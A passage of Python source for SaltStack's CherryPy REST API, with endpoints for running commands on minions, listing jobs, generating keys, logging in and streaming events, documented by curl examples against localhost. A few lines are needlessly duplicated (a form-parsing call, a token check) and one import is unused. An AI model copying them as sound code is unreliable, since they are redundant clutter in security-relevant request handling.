A decorator to skip a processor function if process_request_body is False
'''
@functools.wraps(fn)
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
del contents
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and isinstance(data, collections.Mapping):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list): # pylint: disable=unsupported-membership-test
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
tools_config = {
'on_start_resource': [
('html_override', html_override_tool),
('salt_token', salt_token_tool),
],
'before_request_body': [
('cors_tool', cors_tool),
('salt_auth', salt_auth_tool),
('hypermedia_in', hypermedia_in),
],
'before_handler': [
('lowdata_fmt', lowdata_fmt),
('hypermedia_out', hypermedia_out),
('salt_ip_verify', salt_ip_verify_tool),
],
}
for hook, tool_list in tools_config.items():
for idx, tool_config in enumerate(tool_list):
tool_name, tool_fn = tool_config
setattr(cherrypy.tools, tool_name, cherrypy.Tool(
hook, tool_fn, priority=(50 + idx)))
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.salt_token.on': True,
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if 'token' in chunk:
# Make sure that auth token is hex
try:
int(chunk['token'], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, 'Invalid token')
if 'token' in chunk:
# Make sure that auth token is hex
try:
int(chunk['token'], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, 'Invalid token')
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
@cherrypy.config(**{'tools.sessions.on': False})
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: text
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect # pylint: disable=unused-import
return {
'return': "Welcome",
'clients': salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: text
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
Lowstate data describing Salt commands must be sent in the request
body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: text
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: text
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def GET(self, jid=None, timeout=''):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: text
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: text
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = {'client': 'runner'}
if jid:
lowstate.update({'fun': 'jobs.list_job', 'jid': jid})
else:
lowstate.update({'fun': 'jobs.list_jobs'})
cherrypy.request.lowstate = [lowstate]
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
ret['info'] = [job_ret_info[0]]
minion_ret = {}
returns = job_ret_info[0].get('Result')
for minion in returns:
if u'return' in returns[minion]:
minion_ret[minion] = returns[minion].get(u'return')
else:
minion_ret[minion] = returns[minion].get('return')
ret['return'] = [minion_ret]
else:
ret['return'] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
'''
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: text
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: text
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
@cherrypy.config(**{'tools.hypermedia_out.on': False, 'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>`.
.. note:: A note about ``curl``
Avoid using the ``-i`` flag or HTTP headers will be written and
produce an invalid tar file.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: text
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
lowstate = cherrypy.request.lowstate
lowstate[0].update({
'client': 'wheel',
'fun': 'key.gen_accept',
})
if 'mid' in lowstate[0]:
lowstate[0]['id_'] = lowstate[0].pop('mid')
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = BytesIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
if six.PY3:
pub_key = pub_key.encode(__salt_system_encoding__)
priv_key = priv_key.encode(__salt_system_encoding__)
tarball.addfile(pub_key_file, BytesIO(pub_key))
tarball.addfile(priv_key_file, BytesIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(lowstate[0]['id_'])
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = len(fileobj.getvalue())
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: text
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning(
'Salt Master is not available.')
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get('username', None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
if token['eauth'] == 'django' and '^model' in eauth:
perms = token['auth_list']
else:
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token['name'], [])
perms.extend(eauth.get('*', []))
if 'groups' in token and token['groups']:
user_groups = set(token['groups'])
eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')])
for group in user_groups & eauth_groups:
perms.extend(eauth['{0}%'.format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception:
logger.debug(
"Configuration for external_auth malformed for eauth '%s', "
"and user '%s'.", token.get('eauth'), token.get('name'),
exc_info=True
)
perms = None
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms or {},
}]}
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Token(LowDataAdapter):
'''
Generate a Salt token from eauth credentials
Wraps functionality in the :py:mod:`auth Runner <salt.runners.auth>`.
.. versionadded:: 2017.7.0
'''
@cherrypy.config(**{'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
.. http:post:: /token
Generate a Salt eauth token
:status 200: |200|
:status 400: |400|
:status 401: |401|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/token \
-H 'Content-type: application/json' \
-d '{
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}'
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
[{
"start": 1494987445.528182,
"token": "e72ca1655d05...",
"expire": 1495030645.528183,
"name": "saltdev",
"eauth": "auto"
}]
'''
for creds in cherrypy.request.lowstate:
try:
creds.update({
'client': 'runner',
'fun': 'auth.mk_token',
'kwarg': {
'username': creds['username'],
'password': creds['password'],
'eauth': creds['eauth'],
},
})
except KeyError:
raise cherrypy.HTTPError(400,
'Require "username", "password", and "eauth" params')
return list(self.exec_lowstate())
class Run(LowDataAdapter):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
salt-api does not enforce authorization, Salt's eauth system does that.
Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
**or** ``token`` kwargs that are then checked by the eauth system. The
session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
eauth token and then passes the ``token`` kwarg in automatically.
If you already have a Salt eauth token, perhaps generated by the
:py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
Runner module, then there is no reason to use sessions.
This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
**or** a ``token`` kwarg and does not make use of sessions at all.
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>` Other than that this URL is identical to the
:py:meth:`root URL (/) <LowDataAdapter.POST>`.
.. http:post:: /run
An array of lowstate data describing Salt commands must be sent in
the request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
**Or** using a Salt Eauth token:
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"token": "<salt eauth token here>"
}]'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run enpoint can also be used to issue commands using the salt-ssh
subsystem.
When using salt-ssh, eauth credentials should not be supplied. Instead,
authentication should be handled by the SSH layer itself. The use of
the salt-ssh client does not require a salt master to be running.
Instead, only a roster file must be present in the salt configuration
directory.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: text
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
'''
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
'''
# Make sure that auth token is hex. If it's None, or something other
# than hex, this will raise a ValueError.
try:
int(auth_token, 16)
except (TypeError, ValueError):
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get('token', auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: text
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialze the
JSON object each time.
.. code-block:: text
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
Note, the SSE stream is fast and completely asynchronous and Salt is
very fast. If a job is created using a regular POST request, it is
possible that the job return will be available on the SSE stream before
the response for the POST request arrives. It is important to take that
asynchronicity into account when designing an application. Below are
some general guidelines.
* Subscribe to the SSE stream _before_ creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
synchronous lookups.
* Be cautious in writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
A full, working proof-of-concept JavaScript application is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
cookies = cherrypy.request.cookie
auth_token = token or salt_token or (
cookies['session_id'].value if 'session_id' in cookies else None)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
yield str('retry: 400\n') # future lint: disable=blacklisted-function
while True:
data = next(stream)
yield str('tag: {0}\n').format(data.get('tag', '')) # future lint: disable=blacklisted-function
yield str('data: {0}\n\n').format(salt.utils.json.dumps(data)) # future lint: disable=blacklisted-function
return listen()
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
